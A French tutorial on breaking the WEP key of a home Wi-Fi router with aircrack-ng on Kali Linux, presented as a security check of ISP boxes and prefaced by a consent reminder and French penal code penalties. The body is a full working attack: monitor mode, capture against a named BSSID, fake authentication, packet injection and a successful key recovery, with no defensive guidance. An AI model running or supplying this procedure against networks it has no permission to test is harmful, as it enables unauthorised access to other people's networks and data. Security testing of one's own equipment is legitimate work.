Ce tuto à pour but de voir si les Free Box, Orange Box, SFR Box, Bouygue Box... sont assez bien protégées. L'utilisation de ce tutoriel doit se faire avec l'accord du propriétaire du réseau wi-fi pris pour cible.
Note: L'accès frauduleux et le maintien dans un système est puni d'un an de prison et de 15 000 € d'amende. S'il en résulte une altération, soit des données contenues (suppression ou modification), soit du fonctionnement même du système, les peines prévues sont de deux ans de prison et de 30 000 € (Article 323-1 du Code Pénal). Bien que la notion de maintien dans un système informatique suppose un accès préalable, celui-ci peut-être autorisé tandis que le maintien, ne l'est pas (Cour d'appel de Paris,14 janvier 1997). Accès via Internet Il ne peut être reproché à un internaute d'accéder ou de se maintenir dans les parties des sites qui peuvent être atteintes par la simple utilisation d'un logiciel grand public de navigation. Ces parties sont réputées non confidentielles à défaut de toute indication contraire et de tout obstacle à l'accès (Cour d'appel de Paris, 30 octobre 2002). L'atteinte volontaire au fonctionnement d'un système informatique est punie de trois ans de prison et de 45 000 € d'amende (Article 323-2 du Code Pénal). L'introduction frauduleuse de nouvelles données, leur suppression ou leur modification est puni de trois ans de prison et de de 45 000 € d'amende (Article 323-3 du Code Pénal). De plus l’individu à l’origine de l’infraction pourra être recherché et condamné à des dommages et intérêts pour le préjudice (perte de clients, de commandes, de notoriété...).
Décrypter une clé WEP WAP avec Kali linux 2.0
Tapez dans un Terminal
airmon-ng
Démarrer l'interface wi-fi en mode monitoring
airmon-ng start wlan0
commencer à scanner les réseaux wi-fi
airodump-ng wlan0mon
Note:
Nous avons ici les informations pour la prochaine commande. 3 réseaux disponibles (WPA2, WEP, OPN). Le ESSID correspond au nom du point d'accès Wi-fi. La colonne PWR donne une indication de la puissance de réception. La colonne #Data correspond aux paquets (des bouts de fichiers permettant de cracker une clef wep). Le tuto est maintenant de collecter un grand nombre de #Data dans un fichier data-vdf. Le fichier est créé dans /root/ (Dossier personnel)
Ouvrir un nouveau Terminal
airodump-ng --write data-vdf --channel 11 --bssid 14:0C:76:34:E6:DA wlan0mon
Fake authentication
Ouvrez une nouveau Terminal pour tester l'association avec le point d’accès avec une attaque "-1".
aireplay-ng -1 0 -e ESSID -a 14:0C:76:34:E6:DA -h 68:94:23:1F:67:7D wlan0mon
En cas de problème
airmon-ng check kill
Tuto Injection de paquets
aireplay-ng -3 -e ESSID -b 14:0C:76:34:E6:DA -h 68:94:23:1F:67:7D wlan0mon
après quelque minutes l'injection commence
Décryptage de la clé
aircrack-ng data-vdf-01.cap
Starting PTW attack with 137377 ivs.
KEY FOUND! [
66:82:7D:FE:C6 ]
Decrypted correctly: 100%
Hexadecimal to ASCII string decoder
http://tomeko.net/online_tools/hex_to_ascii.php